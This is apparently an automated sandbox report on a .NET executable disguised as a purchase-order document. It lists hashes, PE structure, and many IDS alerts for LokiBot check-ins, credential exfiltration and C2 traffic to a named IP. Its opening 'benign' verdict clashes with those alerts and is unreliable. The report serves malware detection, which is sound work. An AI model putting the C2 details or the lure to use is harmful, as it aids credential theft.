SHA-512:	E116D2D486BC802E99D5FFE83A666D5E324887A65965C7E0D90B238A4EE1DB97E28F59AED23E6F968868902D762DF06146833BE62064C4A74D7C9384DFB0C7F6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.696683538828848
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	(PO403810)_VOLEX_doc.exe
File size:	208'896 bytes
MD5:	aa2edba076823e2d67c52d3055a15e80
SHA1:	f8ab944af1bf067fcd7f6806311ccd98374d98cd
SHA256:	506acdbf6f6334fb4b7519e45d60f3c90b115853fa4b76d0670bf20698f4c7c4
SHA512:	c47796be2af02e5a3196402bbc893eeda7474c6e4bb418cecc0ac23a30ccecf0422ed36c66caac1662776aaeb2e97aaeb9bf5799b9a46d2f6fab9f8382d06035
SSDEEP:	3072:JvAqCj8Ebdnt7NQs5E8lToQGUWYpzyYTqWH8G+esk60AWQ8jp:9o88568qXUFpWI8G+060jQ8
TLSH:	5314CE71A2679721D55B5E39C49E300C12729F062653E71BE5CC33B90EF23CF2A1A956
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..f..............0..............:... ...@....@.. ....................................`................................

File Icon


Icon Hash:	1a5ada12a98c3689

Static PE Info

General

Entrypoint:	0x423a2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66EC1A4B [Thu Sep 19 12:34:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x239e0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x24000	0x10e64	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x36000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2399a	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x21a34	0x21c00	f136068a9f052812e205e0271e8167d1	False	0.8641854745370371	data	7.690880893460008	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x24000	0x10e64	0x11000	e6050757e28b3d8e4cd5378caa99beef	False	0.05656881893382353	data	2.6821527330566832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x36000	0xc	0x200	a7a36da172f070f0282f48ecf4712fe5	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x24130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.046891636105524666
RT_GROUP_ICON	0x34958	0x14	data	1.15
RT_VERSION	0x3496c	0x30c	data	0.4230769230769231
RT_MANIFEST	0x34c78	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-25T10:19:02.551070+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49842	TCP
2024-09-25T10:19:08.211638+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49699	188.114.97.3	80	TCP
2024-09-25T10:19:08.211638+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49699	188.114.97.3	80	TCP
2024-09-25T10:19:08.211638+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49699	188.114.97.3	80	TCP
2024-09-25T10:19:09.125494+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.7	49699	188.114.97.3	80	TCP
2024-09-25T10:19:09.263458+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49700	188.114.97.3	80	TCP
2024-09-25T10:19:09.263458+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49700	188.114.97.3	80	TCP
2024-09-25T10:19:09.263458+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49700	188.114.97.3	80	TCP
2024-09-25T10:19:09.982295+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.7	49700	188.114.97.3	80	TCP
2024-09-25T10:19:10.062927+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:10.062927+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:10.062927+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:10.811770+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:10.811770+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49701	188.114.97.3	80	TCP
2024-09-25T10:19:10.817841+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49701	TCP
2024-09-25T10:19:10.969314+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:10.969314+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:10.969314+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:11.665714+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:11.665714+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49702	188.114.97.3	80	TCP
2024-09-25T10:19:11.670551+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49702	TCP
2024-09-25T10:19:11.837774+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:11.837774+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:11.837774+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:12.531180+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:12.531180+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49703	188.114.97.3	80	TCP
2024-09-25T10:19:12.537084+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49703	TCP
2024-09-25T10:19:12.688864+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:12.688864+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:12.688864+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:13.453182+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:13.453182+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49704	188.114.97.3	80	TCP
2024-09-25T10:19:13.460991+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49704	TCP
2024-09-25T10:19:13.615421+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:13.615421+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:13.615421+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:14.450457+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:14.450457+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49705	188.114.97.3	80	TCP
2024-09-25T10:19:14.459844+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49705	TCP
2024-09-25T10:19:14.711569+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:14.711569+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:14.711569+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:15.399528+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:15.399528+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49706	188.114.97.3	80	TCP
2024-09-25T10:19:15.404341+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49706	TCP
2024-09-25T10:19:15.581402+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:15.581402+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:15.581402+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:16.220301+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:16.220301+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49707	188.114.97.3	80	TCP
2024-09-25T10:19:16.225141+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49707	TCP
2024-09-25T10:19:16.376989+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:16.376989+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:16.376989+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:17.022071+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:17.022071+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49708	188.114.97.3	80	TCP
2024-09-25T10:19:17.026938+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49708	TCP
2024-09-25T10:19:17.178646+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:17.178646+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:17.178646+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:18.146657+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:18.146657+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49709	188.114.97.3	80	TCP
2024-09-25T10:19:18.146905+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49709	TCP
2024-09-25T10:19:18.296157+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:18.296157+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:18.296157+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:18.987415+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:18.987415+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49710	188.114.97.3	80	TCP
2024-09-25T10:19:18.992492+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49710	TCP
2024-09-25T10:19:19.154274+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:19.154274+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:19.154274+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:19.794940+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:19.794940+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49711	188.114.97.3	80	TCP
2024-09-25T10:19:19.799882+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49711	TCP
2024-09-25T10:19:20.137435+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:20.137435+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:20.137435+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:20.899036+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:20.899036+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49712	188.114.97.3	80	TCP
2024-09-25T10:19:20.903837+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49712	TCP
2024-09-25T10:19:21.053477+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:21.053477+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:21.053477+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:21.689404+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:21.689404+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49713	188.114.97.3	80	TCP
2024-09-25T10:19:21.694245+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49713	TCP
2024-09-25T10:19:21.842648+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:21.842648+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:21.842648+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:22.552651+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:22.552651+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49714	188.114.97.3	80	TCP
2024-09-25T10:19:22.570360+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49714	TCP
2024-09-25T10:19:22.855192+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:22.855192+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:22.855192+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:23.518806+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:23.518806+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49715	188.114.97.3	80	TCP
2024-09-25T10:19:23.523583+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49715	TCP
2024-09-25T10:19:23.676953+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:23.676953+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:23.676953+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:24.365883+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:24.365883+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49718	188.114.97.3	80	TCP
2024-09-25T10:19:24.370931+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49718	TCP
2024-09-25T10:19:24.570672+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:24.570672+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:24.570672+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:25.286543+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:25.286543+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49720	188.114.97.3	80	TCP
2024-09-25T10:19:25.291419+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49720	TCP
2024-09-25T10:19:25.439700+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:25.439700+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:25.439700+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:27.092250+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:27.092250+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49723	188.114.97.3	80	TCP
2024-09-25T10:19:27.096966+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49723	TCP
2024-09-25T10:19:27.269752+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:27.269752+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:27.269752+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:28.045248+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:28.045248+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49724	188.114.97.3	80	TCP
2024-09-25T10:19:28.050244+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49724	TCP
2024-09-25T10:19:28.206792+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:28.206792+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:28.206792+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:28.881607+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:28.881607+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49725	188.114.97.3	80	TCP
2024-09-25T10:19:28.886614+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49725	TCP
2024-09-25T10:19:29.037709+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:29.037709+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:29.037709+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:29.680830+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:29.680830+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49726	188.114.97.3	80	TCP
2024-09-25T10:19:29.685693+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49726	TCP
2024-09-25T10:19:29.847888+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:29.847888+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:29.847888+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:30.583036+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:30.583036+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49727	188.114.97.3	80	TCP
2024-09-25T10:19:30.588201+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49727	TCP
2024-09-25T10:19:30.733826+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:30.733826+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:30.733826+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:31.369595+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:31.369595+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49728	188.114.97.3	80	TCP
2024-09-25T10:19:31.401029+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49728	TCP
2024-09-25T10:19:32.177777+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:32.177777+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:32.177777+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:32.827325+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:32.827325+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49729	188.114.97.3	80	TCP
2024-09-25T10:19:32.832107+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49729	TCP
